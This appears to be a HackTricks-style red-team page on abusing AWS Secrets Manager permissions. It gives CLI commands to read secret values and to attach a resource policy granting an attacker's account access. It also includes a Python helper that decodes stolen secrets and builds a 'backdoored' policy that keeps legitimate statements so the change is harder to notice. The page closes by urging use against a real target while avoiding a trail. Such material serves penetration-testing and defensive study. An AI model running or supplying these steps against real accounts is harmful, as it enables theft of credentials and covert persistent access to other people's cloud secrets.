AWS - Secrets Manager Privesc


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Secrets Manager

For more information about Secrets Manager check:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

An attacker with this permission can retrieve the value stored inside a secret in AWS Secrets Manager (the plaintext is returned in `SecretString`, or base64-encoded in `SecretBinary` for binary secrets).

```bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value (SecretString or base64 SecretBinary)
```

Potential Impact: Access to highly sensitive data stored inside the AWS Secrets Manager service.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

With the previously mentioned permissions it's possible to grant other principals/accounts (even external ones) access to the secret by attaching a resource policy to it. Note that `put-resource-policy` replaces the whole policy, so read the current one first with `get-resource-policy` and keep its statements if you don't want to break (and expose) legitimate access. Also note that to read secrets encrypted with a KMS key the reader also needs access to that KMS key (more info in the KMS Enum page): a secret encrypted with the AWS managed key `aws/secretsmanager` cannot be read from another account at all, and for a customer managed key the key policy must also allow the external principal.

```bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name> # Read the current policy first; put-resource-policy overwrites it
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
```

policy.json:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<attackers_account>:root"
      },
      "Action": "secretsmanager:GetSecretValue",
      "Resource": "*"
    }
  ]
}
```
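The following helper ties both abuses together: it decodes a `get-secret-value` response (handling `SecretString` versus base64 `SecretBinary`), checks from `describe-secret` output whether the secret is encrypted with the AWS managed key (in which case cross-account access will fail regardless of the resource policy), and builds a backdoored resource policy that keeps the existing statements instead of clobbering them. This is an added example, not code from HackTricks or from AWS; the sample JSON documents are constructed for it and the account IDs, ARNs and secret names are placeholders. It processes the JSON the AWS CLI prints, so it runs offline.

```python
"""Helpers for abusing secretsmanager:GetSecretValue and
secretsmanager:PutResourcePolicy on output saved from the AWS CLI, e.g.:
  aws secretsmanager get-secret-value   --secret-id <secret_name> > value.json
  aws secretsmanager describe-secret    --secret-id <secret_name> > desc.json
  aws secretsmanager get-resource-policy --secret-id <secret_name> > policy.json
"""
import base64
import copy
import json

# Constructed sample responses; identifiers below are placeholders.
SAMPLE_STRING_VALUE = {
    "ARN": "arn:aws:secretsmanager:us-east-1:111111111111:secret:db-creds-AbCdEf",
    "Name": "db-creds",
    "SecretString": '{"username":"admin","password":"hunter2"}',
    "VersionStages": ["AWSCURRENT"],
}
SAMPLE_BINARY_VALUE = {
    "ARN": "arn:aws:secretsmanager:us-east-1:111111111111:secret:tls-key-GhIjKl",
    "Name": "tls-key",
    # The CLI prints SecretBinary base64-encoded.
    "SecretBinary": base64.b64encode(b"-----BEGIN PRIVATE KEY-----\n...").decode(),
    "VersionStages": ["AWSCURRENT"],
}
SAMPLE_DESCRIBE_MANAGED = {"Name": "db-creds"}  # no KmsKeyId => aws/secretsmanager
SAMPLE_DESCRIBE_CMK = {
    "Name": "tls-key",
    "KmsKeyId": "arn:aws:kms:us-east-1:111111111111:key/00000000-0000-0000-0000-000000000000",
}
SAMPLE_EXISTING_POLICY = {  # shape of get-resource-policy output (policy is a JSON string)
    "ResourcePolicy": json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::111111111111:role/app-role"},
            "Action": "secretsmanager:GetSecretValue",
            "Resource": "*",
        }],
    })
}


def extract_secret_value(resp):
    """Return the secret material from a get-secret-value response.

    A secret carries either SecretString (text) or SecretBinary (base64 in
    the JSON output); the other key is simply absent.
    """
    if "SecretString" in resp:
        return resp["SecretString"]
    if "SecretBinary" in resp:
        return base64.b64decode(resp["SecretBinary"])
    raise ValueError("response carries neither SecretString nor SecretBinary")


def uses_aws_managed_key(describe):
    """True when the secret is encrypted with the AWS managed key aws/secretsmanager.

    describe-secret omits KmsKeyId for the managed key (an alias may also show
    up). Such secrets cannot be read from another account, so a cross-account
    resource policy alone will not work; only a customer managed key whose key
    policy also allows the attacker does.
    """
    key = describe.get("KmsKeyId", "")
    return key == "" or key.endswith("alias/aws/secretsmanager")


def add_backdoor_statement(get_policy_resp, attacker_account, sid="backdoor"):
    """Return a policy dict that keeps every existing statement and appends one
    granting GetSecretValue to attacker_account.

    put-resource-policy replaces the whole policy, so pushing only the
    attacker's statement would revoke the legitimate principals' access.
    get-resource-policy has no "ResourcePolicy" key when no policy is attached.
    """
    raw = get_policy_resp.get("ResourcePolicy")
    policy = copy.deepcopy(json.loads(raw)) if raw else {"Version": "2012-10-17", "Statement": []}
    statements = policy.setdefault("Statement", [])
    if isinstance(statements, dict):  # a lone statement may be written without a list
        statements = [statements]
        policy["Statement"] = statements
    statements.append({
        "Sid": sid,
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::{attacker_account}:root"},
        "Action": "secretsmanager:GetSecretValue",
        "Resource": "*",
    })
    return policy


if __name__ == "__main__":
    print(extract_secret_value(SAMPLE_STRING_VALUE))
    print(extract_secret_value(SAMPLE_BINARY_VALUE))
    print("managed key (cross-account read impossible):", uses_aws_managed_key(SAMPLE_DESCRIBE_MANAGED))
    # Save this to /tmp/policy.json and push it with:
    #   aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
    print(json.dumps(add_backdoor_statement(SAMPLE_EXISTING_POLICY, "222222222222"), indent=2))
```

Run it against the saved CLI output of a real target instead of the samples; the managed-key check is worth doing before touching the policy, since backdooring a secret you can never read from your own account only leaves a trail.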
